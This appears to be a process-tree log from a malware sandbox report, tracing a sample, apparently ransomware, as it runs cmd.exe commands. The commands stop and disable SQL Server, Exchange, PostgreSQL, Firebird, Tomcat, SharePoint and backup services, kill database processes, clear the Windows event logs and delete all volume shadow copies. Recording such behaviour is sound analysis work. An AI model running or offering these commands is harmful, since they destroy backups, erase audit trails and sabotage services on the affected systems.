C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSSQLSERVER start= disabled2⤵PID:2484
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start= disabled3⤵
- Launches sc.exe
PID:2648
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSSQL$SQLEXPRESS start= disabled2⤵PID:2880
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$SQLEXPRESS start= disabled3⤵
- Launches sc.exe
PID:2760
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSSQLSERVER2⤵PID:3056
-
C:\Windows\SysWOW64\net.exenet stop MSSQLSERVER3⤵PID:2832
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER4⤵PID:1504
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\net1 stop MSSQLSERVER2⤵PID:788
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER3⤵PID:1064
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSSQL$SQLEXPRESS2⤵PID:1272
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS3⤵PID:2904
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵PID:2860
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSSQL$SQLEXPRESS2⤵PID:2176
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS3⤵PID:1496
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵PID:2212
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS2⤵PID:1352
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS3⤵PID:1684
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM pg_ctl.exe /F2⤵PID:2516
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pg_ctl.exe /F3⤵
- Kills process with taskkill
PID:2668
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config postgresql-9.0 start= disabled2⤵PID:1492
-
C:\Windows\SysWOW64\sc.exesc config postgresql-9.0 start= disabled3⤵
- Launches sc.exe
PID:2896
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop postgresql-9.02⤵PID:2780
-
C:\Windows\SysWOW64\net.exenet stop postgresql-9.03⤵PID:1000
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop postgresql-9.04⤵PID:2364
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeAB start= disabled2⤵PID:1996
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeAB start= disabled3⤵
- Launches sc.exe
PID:2064
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeAntispamUpdate start= disabled2⤵PID:1808
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeAntispamUpdate start= disabled3⤵
- Launches sc.exe
PID:2100
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeEdgeSync start= disabled2⤵PID:1060
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeEdgeSync start= disabled3⤵
- Launches sc.exe
PID:2312
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeFDS start= disabled2⤵PID:2708
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeFDS start= disabled3⤵
- Launches sc.exe
PID:1124
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeFBA start= disabled2⤵PID:2788
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeFBA start= disabled3⤵
- Launches sc.exe
PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeImap4 start= disabled2⤵PID:900
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeImap4 start= disabled3⤵
- Launches sc.exe
PID:1192
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeImap4 start= disabled2⤵PID:2264
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeImap4 start= disabled3⤵
- Launches sc.exe
PID:2436
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeIS start= disabled2⤵PID:2036
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeIS start= disabled3⤵PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeMailSubmission start= disabled2⤵PID:1764
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeMailSubmission start= disabled3⤵
- Launches sc.exe
PID:2644
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeMailboxAssistants start= disabled2⤵PID:1140
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeMailboxAssistants start= disabled3⤵
- Launches sc.exe
PID:2596
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeMailboxReplication start= disabled2⤵PID:1876
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeMailboxReplication start= disabled3⤵
- Launches sc.exe
PID:2824
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeMonitoring start= disabled2⤵PID:2112
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeMonitoring start= disabled3⤵
- Launches sc.exe
PID:2544
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangePop3 start= disabled2⤵PID:2592
-
C:\Windows\SysWOW64\sc.exesc config MSExchangePop3 start= disabled3⤵
- Launches sc.exe
PID:1480
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeProtectedServiceHost start= disabled2⤵PID:2464
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeProtectedServiceHost start= disabled3⤵
- Launches sc.exe
PID:3024
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeRPC start= disabled2⤵PID:2552
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeRPC start= disabled3⤵
- Launches sc.exe
PID:2940
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeSearch start= disable2⤵PID:772
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeSearch start= disable3⤵
- Launches sc.exe
PID:2132
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config wsbexchange start= disabled2⤵PID:1660
-
C:\Windows\SysWOW64\sc.exesc config wsbexchange start= disabled3⤵
- Launches sc.exe
PID:1244
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeSA start= disabled2⤵PID:2676
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeSA start= disabled3⤵
- Launches sc.exe
PID:2076
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeThrottling start= disabled2⤵PID:2372
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeThrottling start= disabled3⤵PID:904
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeTransportLogSearch start= disabled2⤵PID:2652
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeTransportLogSearch start= disabled3⤵
- Launches sc.exe
PID:440
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeAB2⤵PID:2548
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeAB3⤵PID:1672
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeAB4⤵PID:2172
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeAntispamUpdate2⤵PID:1964
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeAntispamUpdate3⤵PID:2864
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeAntispamUpdate4⤵PID:2732
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeEdgeSync2⤵PID:1576
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeEdgeSync3⤵PID:1400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeEdgeSync4⤵PID:2816
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeImap42⤵PID:1868
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeImap43⤵PID:2880
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeImap44⤵PID:2008
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeMailboxReplication2⤵PID:1328
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMailboxReplication3⤵PID:616
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMailboxReplication4⤵PID:1488
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSExchangeProtectedServiceHost2⤵PID:1624
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeProtectedServiceHost3⤵PID:1536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeProtectedServiceHost4⤵PID:1064
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl Application2⤵PID:852
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl Application3⤵
- Clears Windows event logs
PID:2236
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl security2⤵PID:1272
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl security3⤵
- Clears Windows event logs
PID:2212
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl setup2⤵PID:2944
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl setup3⤵
- Clears Windows event logs
PID:2248
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil cl system2⤵PID:1108
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl system3⤵
- Clears Windows event logs
PID:1932
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet2⤵PID:1144
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2668
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE2⤵PID:544
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE3⤵PID:892
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE2⤵PID:2920
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL STOPSERVICE3⤵PID:940
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE2⤵PID:1332
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE3⤵PID:1060
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE2⤵PID:1528
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL STOPSERVICE3⤵PID:2936
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SQL%'" CALL STOPSERVIC2⤵PID:2808
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SQL%'" CALL STOPSERVIC3⤵PID:2568
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL STOPSERVICE2⤵PID:1756
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL STOPSERVICE3⤵PID:2144
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%wsbex%'" CALL STOPSERVICE2⤵PID:1860
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%wsbex%'" CALL STOPSERVICE3⤵PID:1092
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%postgresql%'" CALL STOPSERVICE2⤵PID:2512
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%postgresql%'" CALL STOPSERVICE3⤵PID:1188
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%BACKP%'" CALL STOPSERVICE2⤵PID:1876
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%BACKP%'" CALL STOPSERVICE3⤵PID:3060
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%tomcat%'" CALL STOPSERVICE2⤵PID:1368
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%tomcat%'" CALL STOPSERVICE3⤵PID:2592
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SharePoint%'" CALL STOPSERVICE2⤵PID:2296
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SharePoint%'" CALL STOPSERVICE3⤵PID:2080
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SBS%'" CALL STOPSERVICE2⤵PID:2324
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SBS%'" CALL STOPSERVICE3⤵PID:772
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL ChangeStartMode 'Disabled'2⤵PID:344
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Firebird%'" CALL ChangeStartMode 'Disabled'3⤵PID:3016
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL ChangeStartMode 'Disabled'2⤵PID:1776
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%MSSQL%'" CALL ChangeStartMode 'Disabled'3⤵PID:2372
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SQL%'" CALL ChangeStartMode 'Disabled'2⤵PID:1972
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SQL%'" CALL ChangeStartMode 'Disabled'3⤵PID:2244
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL ChangeStartMode 'Disabled'2⤵PID:1968
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%Exchange%'" CALL ChangeStartMode 'Disabled'3⤵PID:3036
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%wsbex%'" CALL ChangeStartMode 'Disabled'2⤵PID:2484
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%wsbex%'" CALL ChangeStartMode 'Disabled'3⤵PID:2000
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%postgresql%'" CALL ChangeStartMode 'Disabled'2⤵PID:2956
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%postgresql%'" CALL ChangeStartMode 'Disabled'3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%BACKP%'" CALL ChangeStartMode 'Disabled'2⤵PID:2948
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%BACKP%'" CALL ChangeStartMode 'Disabled'3⤵PID:1536
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%tomcat%'" CALL ChangeStartMode 'Disabled'2⤵PID:2844
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%tomcat%'" CALL ChangeStartMode 'Disabled'3⤵PID:2868
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SharePoint%'" CALL ChangeStartMode 'Disabled'2⤵PID:852
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SharePoint%'" CALL ChangeStartMode 'Disabled'3⤵PID:2224
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WMIC SERVICE WHERE "caption LIKE '%SBS%'" CALL ChangeStartMode 'Disabled'2⤵PID:332
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE "caption LIKE '%SBS%'" CALL ChangeStartMode 'Disabled'3⤵PID:2468
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config FirebirdServerDefaultInstance start= disabled2⤵PID:1108
-
C:\Windows\SysWOW64\sc.exesc config FirebirdServerDefaultInstance start= disabled3⤵
- Launches sc.exe
PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config FirebirdServerDefaultInstance start= disabled2⤵PID:2516
-
C:\Windows\SysWOW64\sc.exesc config FirebirdServerDefaultInstance start= disabled3⤵PID:1144
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM fb_inet_server.exe /F2⤵PID:1508
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fb_inet_server.exe /F3⤵
- Kills process with taskkill
PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM fb_inet_server.exe /F2⤵PID:2504
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fb_inet_server.exe /F3⤵
- Kills process with taskkill
PID:2100
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop FirebirdServerDefaultInstance2⤵PID:1232
-
C:\Windows\SysWOW64\net.exenet stop FirebirdServerDefaultInstance3⤵PID:2656
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdServerDefaultInstance4⤵PID:2028
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\net1 stop FirebirdServerDefaultInstance2⤵PID:1440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdServerDefaultInstance3⤵PID:2528
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM sqlservr.exe /F2⤵PID:2664
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlservr.exe /F3⤵
- Kills process with taskkill
PID:1752
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSSQLSERVER start= disabled2⤵PID:2540
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start= disabled3⤵
- Launches sc.exe
PID:2568
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSSQL$SQLEXPRESS start= disabled2⤵PID:1192
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$SQLEXPRESS start= disabled3⤵
- Launches sc.exe
PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSSQLSERVER2⤵PID:2704
-
C:\Windows\SysWOW64\net.exenet stop MSSQLSERVER3⤵PID:2264
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER4⤵PID:1872
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\net1 stop MSSQLSERVER2⤵PID:3068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER3⤵PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSSQL$SQLEXPRESS2⤵PID:2644
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS3⤵PID:2768
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵PID:2700
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSSQL$SQLEXPRESS2⤵PID:1188
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS3⤵PID:2932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵PID:752
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS2⤵PID:324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS3⤵PID:2060
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM pg_ctl.exe /F2⤵PID:552
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pg_ctl.exe /F3⤵
- Kills process with taskkill
PID:2152
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config postgresql-9.0 start= disabled2⤵PID:2104
-
C:\Windows\SysWOW64\sc.exesc config postgresql-9.0 start= disabled3⤵PID:2552
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop postgresql-9.02⤵PID:2876
-
C:\Windows\SysWOW64\net.exenet stop postgresql-9.03⤵PID:2560
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop postgresql-9.04⤵PID:2132
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeAB start= disabled2⤵PID:2280
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeAB start= disabled3⤵
- Launches sc.exe
PID:868
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeAntispamUpdate start= disabled2⤵PID:2444
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeAntispamUpdate start= disabled3⤵
- Launches sc.exe
PID:1084
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeEdgeSync start= disabled2⤵PID:3016
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeEdgeSync start= disabled3⤵
- Launches sc.exe
PID:2352
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeFDS start= disabled2⤵PID:1620
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeFDS start= disabled3⤵
- Launches sc.exe
PID:1616
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeFBA start= disabled2⤵PID:1356
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeFBA start= disabled3⤵
- Launches sc.exe
PID:1632
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeImap4 start= disabled2⤵PID:1600
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeImap4 start= disabled3⤵
- Launches sc.exe
PID:2388
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeImap4 start= disabled2⤵PID:2640
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeImap4 start= disabled3⤵
- Launches sc.exe
PID:2220
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeIS start= disabled2⤵PID:1968
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeIS start= disabled3⤵
- Launches sc.exe
PID:2880
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeMailSubmission start= disabled2⤵PID:2612
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeMailSubmission start= disabled3⤵
- Launches sc.exe
PID:1576
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeMailboxAssistants start= disabled2⤵PID:2420
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeMailboxAssistants start= disabled3⤵
- Launches sc.exe
PID:2832
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeMailboxReplication start= disabled2⤵PID:2956
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeMailboxReplication start= disabled3⤵
- Launches sc.exe
PID:2800
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeMonitoring start= disabled2⤵PID:1624
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeMonitoring start= disabled3⤵PID:744
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangePop3 start= disabled2⤵PID:2236
-
C:\Windows\SysWOW64\sc.exesc config MSExchangePop3 start= disabled3⤵
- Launches sc.exe
PID:1408
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeProtectedServiceHost start= disabled2⤵PID:568
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeProtectedServiceHost start= disabled3⤵
- Launches sc.exe
PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeRPC start= disabled2⤵PID:2556
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeRPC start= disabled3⤵
- Launches sc.exe
PID:2748
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeSearch start= disable2⤵PID:1932
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeSearch start= disable3⤵
- Launches sc.exe
PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config wsbexchange start= disabled2⤵PID:2176
-
C:\Windows\SysWOW64\sc.exesc config wsbexchange start= disabled3⤵
- Launches sc.exe
PID:1472
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeSA start= disabled2⤵PID:1108
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeSA start= disabled3⤵
- Launches sc.exe
PID:1648
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeThrottling start= disabled2⤵PID:2516
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeThrottling start= disabled3⤵
- Launches sc.exe
PID:544
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config MSExchangeTransportLogSearch start= disabled2⤵PID:3032
-
C:\Windows\SysWOW64\sc.exesc config MSExchangeTransportLogSearch start= disabled3⤵
- Launches sc.exe
PID:2064
-
-
-
